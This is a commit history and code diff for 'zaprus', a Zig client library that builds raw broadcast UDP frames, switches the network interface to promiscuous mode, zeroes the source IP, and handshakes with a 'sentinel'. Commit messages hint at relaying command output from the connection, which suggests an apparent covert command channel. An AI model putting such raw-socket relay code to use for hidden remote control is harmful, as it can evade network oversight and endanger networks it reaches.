75 Commits

Author SHA1 Message Date
f554e7a3bb Kill process after 10 messages or 3 seconds 2026-01-25 23:49:09 -05:00
19c2b78d1d Connection by default 2026-01-25 01:14:02 -05:00
3c5f34d5c2 Set timeouts instead of sleeping 2026-01-24 21:14:40 -05:00
09152377ed Fix reconnection
Was failing to reconnect due to trying to reuse the same socket that
already had a BPF filter on it.
2026-01-24 20:14:22 -05:00
c3b17f8267 Better error handling and debug logging 2026-01-24 19:17:43 -05:00
cf365673b5 Retry timing
Wait 2 minutes if trying for initial connect. Wait 10 minutes if
connection to sentinel has timed out
2026-01-24 18:54:01 -05:00
16fd65e281 Add C API 2026-01-24 17:16:06 -05:00
8965a4d5d4 Skip empty stdin 2026-01-24 14:42:37 -05:00
ba8a84c478 Don't create dangling references
Apparently things die at the end of blk scopes.
2026-01-24 14:34:19 -05:00
19d4e88c33 Chunk stdin 2026-01-24 13:11:02 -05:00
3577d538b8 Chunk relay input
This makes it possible to chunk connection command output to a relay
command to direct it somewhere like discord
2026-01-24 11:28:18 -05:00
fc9c5bcd5d Chunk messages to 1000 byte payloads 2026-01-24 11:28:18 -05:00
157afa13b1 Fix checksum issue 2026-01-24 10:40:33 -05:00
a81c4b3175 Calculate IPv4 checksum header
This was causing an issue because virtual networks were dropping packets
without this being set
2026-01-23 23:05:20 -05:00
43f7497424 Simplify tagged union 2026-01-23 22:17:21 -05:00
213a01afc8 Implemented client and connection 2026-01-21 22:25:20 -05:00
067a11ab23 Move RawSocket and clean it up 2026-01-20 23:21:35 -05:00
6db4204bf0 Set don't fragment, and use random id 2026-01-20 22:08:10 -05:00
def8454012 Reconnect on timeout 2026-01-19 19:05:03 -05:00
4106679262 things are SOOOO good.... 2026-01-19 17:55:54 -05:00
01f44949f1 base64 encode payload and don't require connection playload 2026-01-19 17:16:29 -05:00
19126f1203 Attach BPF filter to get all the saprus messages 2026-01-19 17:04:08 -05:00
fec468c508 Complete handshake badly 2026-01-19 15:06:25 -05:00
9359fefdf7 Add real RawSocket deinit 2026-01-19 14:45:29 -05:00
f969d097ab Detect interface and use real mac 2026-01-19 14:43:44 -05:00
cc765dc91b Start adding connection message 2026-01-19 14:08:27 -05:00
abf2cfb366 use disc as default dest 2026-01-19 13:00:28 -05:00
c66b95bf89 Write relay message to the network 2026-01-19 12:59:21 -05:00
d7dedd243e construct full message 2026-01-19 12:30:08 -05:00
9947c21b4c Arrange bytes for relay 2026-01-19 12:12:23 -05:00
8a53c7366a 2026-01-18 17:20:44 -05:00
a33a96dafd start doing packet stuff 2026-01-17 21:38:23 -05:00
1a817df18d Mostly done with parsing and serializing messages 2026-01-17 16:06:47 -05:00
0d9c0c33fa 2026-01-14 19:34:35 -05:00
b3f1b00510 start porting to 0.16.0 2026-01-11 18:06:36 -05:00
7a8874ea6a doing some shenanigans
trying to start writing my own function to do raw socket connections
2026-01-10 21:17:46 -05:00
b39603522f 2025-11-14 14:47:56 -05:00
fc329d1064 2025-10-13 13:28:41 -04:00
3abe3095e6 Remove prints 2025-10-12 21:40:23 -04:00
d6da3cd31b IT'S RIGHT 2025-10-12 21:13:42 -04:00
fe166d2106 Start breaking out net logic to NetWriter 2025-10-12 18:05:34 -04:00
439ee00444 Simplify RawSocketWriter
Does not need to use an allocator anymor.
Just uses the internal buffer properly.
2025-10-12 18:02:56 -04:00
0da7bbda5b Cleanup and use random mac 2025-10-12 14:16:57 -04:00
b06cb6dada it works well! 2025-09-23 16:22:57 -04:00
b8313e4fa4 2025-09-23 15:01:12 -04:00
b5efbd6e16 Write ether headers properly 2025-09-23 14:16:55 -04:00
30243db5c9 2025-09-23 13:33:17 -04:00
c673401c2a Use writer instead of RawSocket in Client 2025-09-09 22:30:31 -04:00
74b0c9ef1f Use 0.15.1 for application 2025-09-09 20:19:48 -04:00
0778889af5 Upgrade deps to 0.15.1 2025-09-09 17:32:59 -04:00
56b6b8a386 Use Client as var type instead of singleton 2025-05-11 13:52:42 -04:00
14ed0bc3f3 Fix issue returning stack pointer 2025-05-11 13:40:55 -04:00
c72503fce6 Fix extra bytes in connection message. 2025-05-11 13:40:23 -04:00
373dbebc8c Add broadcast initial interest using raw sockets
Use this from the relay message
2025-05-11 11:40:15 -04:00
cde289d648 Update gatorcat dep and use bytes for broadcast message
The latter is helpful for the lifetime of the message.
2025-05-11 10:12:26 -04:00
716fb466fa Remove allocation for messages 2025-05-10 21:46:53 -04:00
583f9d8b8f Add comments and fix tests
Also added networkBytesAsValue and restored bytesAsValue.
These are useful for treating the bytes from the network directly as a Message.
Otherwise, the init function would overwrite the packet type and length to be correct.
I would like the message handling to fail if the message body is incorrect.
2025-05-10 21:46:53 -04:00
56e72928c6 fix use after free 2025-05-10 21:46:53 -04:00
a80c9abfe7 Attempt to base64 encode the connection payload
For some reason I am still getting this:

2025/05/10 16:37:06 Error decoding message: SGVsbG8gZGFya25lc3MgbXkgb2xkIGZyaWVuZA==::53475673624738675a4746796132356c63334d6762586b676232786b49475a79615756755a413d3daaaa
2025-05-10 21:46:53 -04:00
245dab4909 Use slice for init, and add better error sets.
The slice sets us avoid allocating within the init function.
This means init can't fail, and it also makes it easier to stack allocate messages (slice an array buffer, instead of creating a stack allocator).
2025-05-10 21:46:53 -04:00
cde5c3626c 2025-05-10 21:46:53 -04:00
e84d1a2300 2025-05-10 21:46:53 -04:00
1b7d9bbb1a Remove bytesAsValueUnchecked
Callers can instead use std.mem.bytesAsValue directly.
2025-05-10 21:46:53 -04:00
1512ec1a86 Cleanup asBytes and test it 2025-05-10 21:46:53 -04:00
f1dce257be Simplify init interface 2025-05-10 21:46:53 -04:00
bcab1e4d00 2025-05-10 21:46:53 -04:00
0e8f016978 Align the bytes instead of the struct 2025-05-10 21:46:53 -04:00
fc53e87389 2025-05-10 21:46:53 -04:00
cbf554e853 2025-05-10 21:46:53 -04:00
775212013f 2025-05-10 21:46:53 -04:00
339ac5cfe5 2025-05-10 21:46:53 -04:00
eacfaffb6b 2025-05-10 21:46:53 -04:00
1731b2e643 2025-05-10 21:46:53 -04:00
dae66a0039 Starting real connections 2025-05-10 21:46:53 -04:00
683a2015b0 Use FAIL as the default dest if unable to parse 2025-04-27 18:03:06 -04:00
11 changed files with 1097 additions and 499 deletions

207
build.zig
View File

@@ -1,89 +1,129 @@
const std = @import("std");
const Step = std.Build.Step;
// Although this function looks imperative, note that its job is to
// declaratively construct a build graph that will be executed by an external
// runner.
// Although this function looks imperative, it does not perform the build
// directly and instead it mutates the build graph (`b`) that will be then
// executed by an external runner. The functions in `std.Build` implement a DSL
// for defining build steps and express dependencies between them, allowing the
// build runner to parallelize the build automatically (and the cache system to
// know when a step doesn't need to be re-run).
pub fn build(b: *std.Build) void {
// Standard target options allows the person running `zig build` to choose
// Standard target options allow the person running `zig build` to choose
// what target to build for. Here we do not override the defaults, which
// means any target is allowed, and the default is native. Other options
// for restricting supported target set are available.
const target = b.standardTargetOptions(.{});
// Standard optimization options allow the person running `zig build` to select
// between Debug, ReleaseSafe, ReleaseFast, and ReleaseSmall. Here we do not
// set a preferred release mode, allowing the user to decide how to optimize.
const optimize = b.standardOptimizeOption(.{});
// It's also possible to define more custom flags to toggle optional features
// of this build script using `b.option()`. All defined flags (including
// target and optimize options) will be listed when running `zig build --help`
// in this directory.
const lib_mod = b.createModule(.{
// This creates a module, which represents a collection of source files alongside
// some compilation options, such as optimization mode and linked system libraries.
// Zig modules are the preferred way of making Zig code available to consumers.
// addModule defines a module that we intend to make available for importing
// to our consumers. We must give it a name because a Zig package can expose
// multiple modules and consumers will need to be able to specify which
// module they want to access.
const mod = b.addModule("zaprus", .{
// The root source file is the "entry point" of this module. Users of
// this module will only be able to access public declarations contained
// in this file, which means that if you have declarations that you
// intend to expose to consumers that were defined in other files part
// of this module, you will have to make sure to re-export them from
// the root file.
.root_source_file = b.path("src/root.zig"),
// Later on we'll use this module as the root module of a test executable
// which requires us to specify a target.
.target = target,
});
// Create static library
const lib = b.addLibrary(.{
.name = "zaprus",
.root_module = b.createModule(.{
.root_source_file = b.path("src/c_api.zig"),
.target = target,
.optimize = optimize,
.link_libc = true,
.imports = &.{
.{ .name = "zaprus", .module = mod },
},
}),
});
// We will also create a module for our other entry point, 'main.zig'.
const exe_mod = b.createModule(.{
// `root_source_file` is the Zig "entry point" of the module. If a module
// only contains e.g. external object files, you can make this `null`.
// In this case the main source file is merely a path, however, in more
// complicated build scripts, this could be a generated file.
.root_source_file = b.path("src/main.zig"),
.target = target,
.optimize = optimize,
});
b.installArtifact(lib);
lib.installHeader(b.path("include/zaprus.h"), "zaprus.h");
lib_mod.addImport("network", b.dependency("network", .{}).module("network"));
exe_mod.addImport("zaprus", lib_mod);
exe_mod.addImport("clap", b.dependency("clap", .{}).module("clap"));
const static_lib = b.addLibrary(.{
.linkage = .static,
.name = "zaprus",
.root_module = lib_mod,
});
b.installArtifact(static_lib);
const dynamic_lib = b.addLibrary(.{
.linkage = .dynamic,
.name = "zaprus",
.root_module = lib_mod,
});
b.installArtifact(dynamic_lib);
// C Headers
const c_header = b.addInstallFileWithDir(
b.path("include/zaprus.h"),
.header,
"zaprus.h",
);
b.getInstallStep().dependOn(&c_header.step);
// This creates another `std.Build.Step.Compile`, but this one builds an executable
// rather than a static library.
// Here we define an executable. An executable needs to have a root module
// which needs to expose a `main` function. While we could add a main function
// to the module defined above, it's sometimes preferable to split business
// logic and the CLI into two separate modules.
//
// If your goal is to create a Zig library for others to use, consider if
// it might benefit from also exposing a CLI tool. A parser library for a
// data serialization format could also bundle a CLI syntax checker, for example.
//
// If instead your goal is to create an executable, consider if users might
// be interested in also being able to embed the core functionality of your
// program in their own executable in order to avoid the overhead involved in
// subprocessing your CLI tool.
//
// If neither case applies to you, feel free to delete the declaration you
// don't need and to put everything under a single module.
const exe = b.addExecutable(.{
.name = "zaprus",
.root_module = exe_mod,
.root_module = b.createModule(.{
// b.createModule defines a new module just like b.addModule but,
// unlike b.addModule, it does not expose the module to consumers of
// this package, which is why in this case we don't have to give it a name.
.root_source_file = b.path("src/main.zig"),
// Target and optimization levels must be explicitly wired in when
// defining an executable or library (in the root module), and you
// can also hardcode a specific target for an executable or library
// definition if desireable (e.g. firmware for embedded devices).
.target = target,
.optimize = optimize,
// List of modules available for import in source files part of the
// root module.
.imports = &.{
// Here "zaprus" is the name you will use in your source code to
// import this module (e.g. `@import("zaprus")`). The name is
// repeated because you are allowed to rename your imports, which
// can be extremely useful in case of collisions (which can happen
// importing modules from different packages).
.{ .name = "zaprus", .module = mod },
},
}),
});
// This declares intent for the executable to be installed into the
// standard location when the user invokes the "install" step (the default
// step when running `zig build`).
// install prefix when running `zig build` (i.e. when executing the default
// step). By default the install prefix is `zig-out/` but can be overridden
// by passing `--prefix` or `-p`.
b.installArtifact(exe);
// This *creates* a Run step in the build graph, to be executed when another
// step is evaluated that depends on it. The next line below will establish
// such a dependency.
const run_cmd = b.addRunArtifact(exe);
// This creates a top level step. Top level steps have a name and can be
// invoked by name when running `zig build` (e.g. `zig build run`).
// This will evaluate the `run` step rather than the default step.
// For a top level step to actually do something, it must depend on other
// steps (e.g. a Run step, as we will see in a moment).
const run_step = b.step("run", "Run the app");
// By making the run step depend on the install step, it will be run from the
// This creates a RunArtifact step in the build graph. A RunArtifact step
// invokes an executable compiled by Zig. Steps will only be executed by the
// runner if invoked directly by the user (in the case of top level steps)
// or if another step depends on it, so it's up to you to define when and
// how this Run step will be executed. In our case we want to run it when
// the user runs `zig build run`, so we create a dependency link.
const run_cmd = b.addRunArtifact(exe);
run_step.dependOn(&run_cmd.step);
// By making the run step depend on the default step, it will be run from the
// installation directory rather than directly from within the cache directory.
// This is not necessary, however, if the application depends on other installed
// files, this ensures they will be present and in the expected location.
run_cmd.step.dependOn(b.getInstallStep());
// This allows the user to pass arguments to the application in the build
@@ -92,21 +132,42 @@ pub fn build(b: *std.Build) void {
run_cmd.addArgs(args);
}
// This creates a build step. It will be visible in the `zig build --help` menu,
// and can be selected like this: `zig build run`
// This will evaluate the `run` step rather than the default, which is "install".
const run_step = b.step("run", "Run the app");
run_step.dependOn(&run_cmd.step);
const exe_unit_tests = b.addTest(.{
.root_module = exe_mod,
// Creates an executable that will run `test` blocks from the provided module.
// Here `mod` needs to define a target, which is why earlier we made sure to
// set the releative field.
const mod_tests = b.addTest(.{
.root_module = mod,
});
const run_exe_unit_tests = b.addRunArtifact(exe_unit_tests);
// A run step that will run the test executable.
const run_mod_tests = b.addRunArtifact(mod_tests);
// Similar to creating the run step earlier, this exposes a `test` step to
// the `zig build --help` menu, providing a way for the user to request
// running the unit tests.
const test_step = b.step("test", "Run unit tests");
test_step.dependOn(&run_exe_unit_tests.step);
// Creates an executable that will run `test` blocks from the executable's
// root module. Note that test executables only test one module at a time,
// hence why we have to create two separate ones.
const exe_tests = b.addTest(.{
.root_module = exe.root_module,
});
// A run step that will run the second test executable.
const run_exe_tests = b.addRunArtifact(exe_tests);
// A top level step for running all tests. dependOn can be called multiple
// times and since the two run steps do not depend on one another, this will
// make the two of them run in parallel.
const test_step = b.step("test", "Run tests");
test_step.dependOn(&run_mod_tests.step);
test_step.dependOn(&run_exe_tests.step);
// Just like flags, top level steps are also listed in the `--help` menu.
//
// The Zig build system is entirely implemented in userland, which means
// that it cannot hook into private compiler APIs. All compilation work
// orchestrated by the build system will result in other Zig compiler
// subcommands being invoked with the right flags defined. You can observe
// these invocations when one fails (or you pass a flag to increase
// verbosity) to validate assumptions and diagnose problems.
//
// Lastly, the Zig build system is relatively simple and self-contained,
// and reading its source code will allow you to master it.
}

View File

@@ -10,7 +10,7 @@
// This is a [Semantic Version](https://semver.org/).
// In a future version of Zig it will be used for package deduplication.
.version = "0.0.0",
.version = "0.1.0",
// Together with name, this represents a globally unique package
// identifier. This field is generated by the Zig toolchain when the
@@ -28,23 +28,14 @@
// Tracks the earliest Zig version that the package considers to be a
// supported use case.
.minimum_zig_version = "0.14.0",
.minimum_zig_version = "0.16.0",
// This field is optional.
// Each dependency must either provide a `url` and `hash`, or a `path`.
// `zig build --fetch` can be used to fetch all dependencies of a package, recursively.
// Once all dependencies are fetched, `zig build` no longer requires
// internet connectivity.
.dependencies = .{
.network = .{
.url = "https://github.com/ikskuh/zig-network/archive/c76240d2240711a3dcbf1c0fb461d5d1f18be79a.zip",
.hash = "network-0.1.0-AAAAAOwlAQAQ6zKPUrsibdpGisxld9ftUKGdMvcCSpaj",
},
.clap = .{
.url = "git+https://github.com/Hejsil/zig-clap?ref=0.10.0#e47028deaefc2fb396d3d9e9f7bd776ae0b2a43a",
.hash = "clap-0.10.0-oBajB434AQBDh-Ei3YtoKIRxZacVPF1iSwp3IX_ZB8f0",
},
},
.dependencies = .{},
.paths = .{
"build.zig",
"build.zig.zon",

View File

@@ -1,24 +1,33 @@
// client
#ifndef ZAPRUS_H
#define ZAPRUS_H
int zaprus_init(void);
#include <stdint.h>
#include <stdlib.h>
int zaprus_deinit(void);
typedef void* zaprus_client;
typedef void* zaprus_connection;
int zaprus_send_relay(const char* payload, usize len, char[4] dest);
// Returns NULL if there was an error.
zaprus_client zaprus_init_client(void);
int zaprus_send_initial_connection(const char* payload, usize len, uint16_t initial_port);
void zaprus_deinit_client(zaprus_client client);
struct SaprusMessage* zaprus_connect(const char* payload, usize len);
// Returns 0 on success, else returns 1.
int zaprus_client_send_relay(zaprus_client client, const char* payload, size_t payload_len, const char dest[4]);
// message
struct SaprusMessage {
// Returns NULL if there was an error.
// Caller should call zaprus_deinit_connection when done with the connection.
zaprus_connection zaprus_connect(zaprus_client client, const char* payload, size_t payload_len);
};
void zaprus_deinit_connection(zaprus_connection connection);
// ptr should be freed by the caller.
int zaprus_message_to_bytes(struct SaprusMessage msg, char** ptr, usize* len);
// Capacity is the maximum length of the output buffer.
// out_len is modified to specify how much of the capacity is used by the response.
// Blocks until the next message is available, or returns 1 if the underlying socket times out.
// Returns 0 on success, else returns 1.
int zaprus_connection_next(zaprus_connection connection, char *out, size_t capacity, size_t *out_len);
// Return value should be destroyed with zaprus_message_deinit.
struct SaprusMessage* zaprus_message_from_bytes(const char* bytes, usize len);
// Returns 0 on success, else returns 1.
int zaprus_connection_send(zaprus_connection connection, const char *payload, size_t payload_len);
void zaprus_message_deinit(struct SaprusMessage* msg);
#endif // ZAPRUS_H

View File

@@ -1,124 +1,146 @@
var rand: ?Random = null;
const base64_enc = std.base64.standard.Encoder;
const base64_dec = std.base64.standard.Decoder;
pub fn init() !void {
var prng = Random.DefaultPrng.init(blk: {
var seed: u64 = undefined;
try posix.getrandom(mem.asBytes(&seed));
break :blk seed;
});
rand = prng.random();
try network.init();
const Client = @This();
const max_message_size = 2048;
pub const max_payload_len = RawSocket.max_payload_len;
socket: RawSocket,
pub fn init() !Client {
const socket: RawSocket = try .init();
return .{
.socket = socket,
};
}
pub fn deinit() void {
network.deinit();
pub fn deinit(self: *Client) void {
self.socket.deinit();
self.* = undefined;
}
fn broadcastSaprusMessage(msg: SaprusMessage, udp_port: u16, allocator: Allocator) !void {
const msg_bytes = try msg.toBytes(allocator);
defer allocator.free(msg_bytes);
pub fn sendRelay(self: *Client, io: Io, payload: []const u8, dest: [4]u8) !void {
const io_source: std.Random.IoSource = .{ .io = io };
const rand = io_source.interface();
var sock = try network.Socket.create(.ipv4, .udp);
defer sock.close();
try sock.setBroadcast(true);
// Bind to 0.0.0.0:0
const bind_addr = network.EndPoint{
.address = network.Address{ .ipv4 = network.Address.IPv4.any },
.port = 0,
var headers: EthIpUdp = .{
.src_mac = self.socket.mac,
.ip = .{
.id = rand.int(u16),
.src_addr = 0, //rand.int(u32),
.dst_addr = @bitCast([_]u8{ 255, 255, 255, 255 }),
.len = undefined,
},
.udp = .{
.src_port = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dst_port = 8888,
.len = undefined,
},
};
const dest_addr = network.EndPoint{
.address = network.Address{ .ipv4 = network.Address.IPv4.broadcast },
.port = udp_port,
};
try sock.bind(bind_addr);
_ = try sock.sendTo(dest_addr, msg_bytes);
}
pub fn sendRelay(payload: []const u8, dest: [4]u8, allocator: Allocator) !void {
const msg = SaprusMessage{
const relay: SaprusMessage = .{
.relay = .{
.header = .{ .dest = dest },
.dest = .fromBytes(&dest),
.payload = payload,
},
};
try broadcastSaprusMessage(msg, 8888, allocator);
var relay_buf: [max_message_size - (@bitSizeOf(EthIpUdp) / 8)]u8 = undefined;
const relay_bytes = relay.toBytes(&relay_buf);
headers.setPayloadLen(relay_bytes.len);
var msg_buf: [max_message_size]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(relay_bytes) catch unreachable;
const full_msg = msg_w.buffered();
try self.socket.send(full_msg);
}
fn randomPort() u16 {
var p: u16 = 0;
if (rand) |r| {
p = r.intRangeAtMost(u16, 1024, 65000);
} else unreachable;
pub fn connect(self: Client, io: Io, payload: []const u8) !SaprusConnection {
const io_source: std.Random.IoSource = .{ .io = io };
const rand = io_source.interface();
return p;
}
var headers: EthIpUdp = .{
.src_mac = self.socket.mac,
.ip = .{
.id = rand.int(u16),
.src_addr = 0, //rand.int(u32),
.dst_addr = @bitCast([_]u8{ 255, 255, 255, 255 }),
.len = undefined,
},
.udp = .{
.src_port = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dst_port = 8888,
.len = undefined,
},
};
pub fn sendInitialConnection(payload: []const u8, initial_port: u16, allocator: Allocator) !SaprusMessage {
const dest_port = randomPort();
const msg = SaprusMessage{
// udp dest port should not be 8888 after first
const udp_dest_port = rand.intRangeAtMost(u16, 9000, std.math.maxInt(u16));
var connection: SaprusMessage = .{
.connection = .{
.header = .{
.src_port = initial_port,
.dest_port = dest_port,
},
.src = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.dest = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)),
.seq = undefined,
.id = undefined,
.payload = payload,
},
};
try broadcastSaprusMessage(msg, 8888, allocator);
return msg;
}
pub fn connect(payload: []const u8, allocator: Allocator) !?SaprusMessage {
var initial_port: u16 = 0;
if (rand) |r| {
initial_port = r.intRangeAtMost(u16, 1024, 65000);
} else unreachable;
var initial_conn_res: ?SaprusMessage = null;
errdefer if (initial_conn_res) |c| c.deinit(allocator);
var sock = try network.Socket.create(.ipv4, .udp);
defer sock.close();
// Bind to 255.255.255.255:8888
const bind_addr = network.EndPoint{
.address = network.Address{ .ipv4 = network.Address.IPv4.broadcast },
.port = 8888,
log.debug("Setting bpf filter to port {}", .{connection.connection.src});
self.socket.attachSaprusPortFilter(connection.connection.src) catch |err| {
log.err("Failed to set port filter: {t}", .{err});
return err;
};
log.debug("bpf set", .{});
// timeout 1s
try sock.setReadTimeout(1 * std.time.us_per_s);
try sock.bind(bind_addr);
var connection_buf: [2048]u8 = undefined;
var connection_bytes = connection.toBytes(&connection_buf);
headers.setPayloadLen(connection_bytes.len);
const msg = try sendInitialConnection(payload, initial_port, allocator);
log.debug("Building full message", .{});
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
var full_msg = msg_w.buffered();
log.debug("Built full message. Sending message", .{});
var response_buf: [4096]u8 = undefined;
_ = try sock.receive(&response_buf); // Ignore message that I sent.
const len = try sock.receive(&response_buf);
try self.socket.send(full_msg);
var res_buf: [4096]u8 = undefined;
initial_conn_res = try SaprusMessage.fromBytes(response_buf[0..len], allocator);
log.debug("Awaiting handshake response", .{});
// Ignore response from sentinel, just accept that we got one.
_ = try self.socket.receive(&res_buf);
// Complete handshake after awaiting response
try broadcastSaprusMessage(msg, randomPort(), allocator);
headers.udp.dst_port = udp_dest_port;
headers.ip.id = rand.int(u16);
headers.setPayloadLen(connection_bytes.len);
return initial_conn_res;
log.debug("Building final handshake message", .{});
msg_w.end = 0;
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
full_msg = msg_w.buffered();
try self.socket.send(full_msg);
return .init(self.socket, headers, connection);
}
const RawSocket = @import("./RawSocket.zig");
const SaprusMessage = @import("message.zig").Message;
const SaprusConnection = @import("Connection.zig");
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
const std = @import("std");
const Random = std.Random;
const posix = std.posix;
const mem = std.mem;
const network = @import("network");
const Allocator = mem.Allocator;
const Io = std.Io;
const Writer = std.Io.Writer;
const log = std.log;

61
src/Connection.zig Normal file
View File

@@ -0,0 +1,61 @@
socket: RawSocket,
headers: EthIpUdp,
connection: SaprusMessage,
const Connection = @This();
pub fn init(socket: RawSocket, headers: EthIpUdp, connection: SaprusMessage) Connection {
return .{
.socket = socket,
.headers = headers,
.connection = connection,
};
}
pub fn next(self: Connection, io: Io, buf: []u8) ![]const u8 {
_ = io;
log.debug("Awaiting connection message", .{});
const res = try self.socket.receive(buf);
log.debug("Received {} byte connection message", .{res.len});
const msg: SaprusMessage = try .parse(res[42..]);
const connection_res = msg.connection;
log.debug("Payload was {s}", .{connection_res.payload});
return connection_res.payload;
}
pub fn send(self: *Connection, io: Io, buf: []const u8) !void {
const io_source: std.Random.IoSource = .{ .io = io };
const rand = io_source.interface();
log.debug("Sending connection message", .{});
self.connection.connection.payload = buf;
var connection_bytes_buf: [2048]u8 = undefined;
const connection_bytes = self.connection.toBytes(&connection_bytes_buf);
self.headers.ip.id = rand.int(u16);
self.headers.setPayloadLen(connection_bytes.len);
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
try msg_w.writeAll(&self.headers.toBytes());
try msg_w.writeAll(connection_bytes);
const full_msg = msg_w.buffered();
try self.socket.send(full_msg);
log.debug("Sent {} byte connection message", .{full_msg.len});
}
const std = @import("std");
const Io = std.Io;
const Writer = std.Io.Writer;
const log = std.log;
const SaprusMessage = @import("./message.zig").Message;
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
const RawSocket = @import("./RawSocket.zig");

93
src/EthIpUdp.zig Normal file
View File

@@ -0,0 +1,93 @@
pub const EthIpUdp = packed struct(u336) { // 42 bytes * 8 bits = 336
// --- UDP (Last in memory, defined first for LSB->MSB) ---
udp: packed struct {
checksum: u16 = 0,
len: u16,
dst_port: u16,
src_port: u16,
},
// --- IP ---
ip: packed struct {
dst_addr: u32,
src_addr: u32,
header_checksum: u16 = 0,
protocol: u8 = 17, // udp
ttl: u8 = 0x40,
// fragment_offset (13 bits) + flags (3 bits) = 16 bits
// In Big Endian, flags are the high bits of the first byte.
// To have flags appear first in the stream, define them last here.
fragment_offset: u13 = 0,
flags: packed struct(u3) {
reserved: u1 = 0,
dont_fragment: u1 = 1,
more_fragments: u1 = 0,
} = .{},
id: u16,
len: u16,
tos: u8 = undefined,
// ip_version (4 bits) + ihl (4 bits) = 8 bits
// To have version appear first (high nibble), define it last.
ihl: u4 = 5,
ip_version: u4 = 4,
},
// --- Ethernet ---
eth_type: u16 = std.os.linux.ETH.P.IP,
src_mac: @Vector(6, u8),
dst_mac: @Vector(6, u8) = @splat(0xff),
pub fn toBytes(self: @This()) [336 / 8]u8 {
var res: [336 / 8]u8 = undefined;
var w: Writer = .fixed(&res);
w.writeStruct(self, .big) catch unreachable;
return res;
}
pub fn setPayloadLen(self: *@This(), len: usize) void {
self.ip.len = @intCast(len + (@bitSizeOf(@TypeOf(self.udp)) / 8) + (@bitSizeOf(@TypeOf(self.ip)) / 8));
// Zero the checksum field before calculation
self.ip.header_checksum = 0;
// Serialize IP header to big-endian bytes
var ip_bytes: [@bitSizeOf(@TypeOf(self.ip)) / 8]u8 = undefined;
var w: Writer = .fixed(&ip_bytes);
w.writeStruct(self.ip, .big) catch unreachable;
// Calculate checksum over serialized bytes
self.ip.header_checksum = onesComplement16(&ip_bytes);
self.udp.len = @intCast(len + (@bitSizeOf(@TypeOf(self.udp)) / 8));
}
};
fn onesComplement16(data: []const u8) u16 {
var sum: u32 = 0;
// Process pairs of bytes as 16-bit words
var i: usize = 0;
while (i + 1 < data.len) : (i += 2) {
const word: u16 = (@as(u16, data[i]) << 8) | data[i + 1];
sum += word;
}
// Handle odd byte if present
if (data.len % 2 == 1) {
sum += @as(u32, data[data.len - 1]) << 8;
}
// Fold 32-bit sum to 16 bits
while (sum >> 16 != 0) {
sum = (sum & 0xFFFF) + (sum >> 16);
}
// Return ones' complement
return ~@as(u16, @truncate(sum));
}
const std = @import("std");
const Writer = std.Io.Writer;

167
src/RawSocket.zig Normal file
View File

@@ -0,0 +1,167 @@
const RawSocket = @This();
const is_debug = builtin.mode == .Debug;
fd: i32,
sockaddr_ll: std.posix.sockaddr.ll,
mac: [6]u8,
pub const max_payload_len = 1000;
const Ifconf = extern struct {
ifc_len: i32,
ifc_ifcu: extern union {
ifcu_buf: ?[*]u8,
ifcu_req: ?[*]std.os.linux.ifreq,
},
};
pub fn init() !RawSocket {
const socket: i32 = std.math.cast(i32, std.os.linux.socket(std.os.linux.AF.PACKET, std.os.linux.SOCK.RAW, 0)) orelse return error.SocketError;
if (socket < 0) return error.SocketError;
var ifreq_storage: [16]std.os.linux.ifreq = undefined;
var ifc = Ifconf{
.ifc_len = @sizeOf(@TypeOf(ifreq_storage)),
.ifc_ifcu = .{ .ifcu_req = &ifreq_storage },
};
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFCONF, @intFromPtr(&ifc)) != 0) {
return error.NicError;
}
const count = @divExact(ifc.ifc_len, @sizeOf(std.os.linux.ifreq));
// Get the first non loopback interface
var ifr = for (ifreq_storage[0..@intCast(count)]) |*ifr| {
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFFLAGS, @intFromPtr(ifr)) == 0) {
if (ifr.ifru.flags.LOOPBACK) continue;
break ifr;
}
} else return error.NoInterfaceFound;
// 2. Get Interface Index
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFINDEX, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
const ifindex: i32 = ifr.ifru.ivalue;
// 3. Get Real MAC Address
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFHWADDR, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
var mac: [6]u8 = ifr.ifru.hwaddr.data[0..6].*;
if (builtin.cpu.arch.endian() == .little) std.mem.reverse(u8, &mac);
// 4. Set Flags (Promiscuous/Broadcast)
if (std.os.linux.ioctl(socket, std.os.linux.SIOCGIFFLAGS, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
ifr.ifru.flags.BROADCAST = true;
ifr.ifru.flags.PROMISC = true;
if (std.os.linux.ioctl(socket, std.os.linux.SIOCSIFFLAGS, @intFromPtr(ifr)) != 0) {
return error.NicError;
}
const sockaddr_ll = std.mem.zeroInit(std.posix.sockaddr.ll, .{
.family = std.posix.AF.PACKET,
.ifindex = ifindex,
.protocol = std.mem.nativeToBig(u16, @as(u16, std.os.linux.ETH.P.IP)),
});
const bind_ret = std.os.linux.bind(socket, @ptrCast(&sockaddr_ll), @sizeOf(@TypeOf(sockaddr_ll)));
if (bind_ret != 0) return error.BindError;
return .{
.fd = socket,
.sockaddr_ll = sockaddr_ll,
.mac = mac,
};
}
pub fn setTimeout(self: *RawSocket, sec: isize, usec: i64) !void {
const timeout: std.os.linux.timeval = .{ .sec = sec, .usec = usec };
const timeout_ret = std.os.linux.setsockopt(self.fd, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
if (timeout_ret != 0) return error.SetTimeoutError;
}
pub fn deinit(self: *RawSocket) void {
_ = std.os.linux.close(self.fd);
self.* = undefined;
}
pub fn send(self: RawSocket, payload: []const u8) !void {
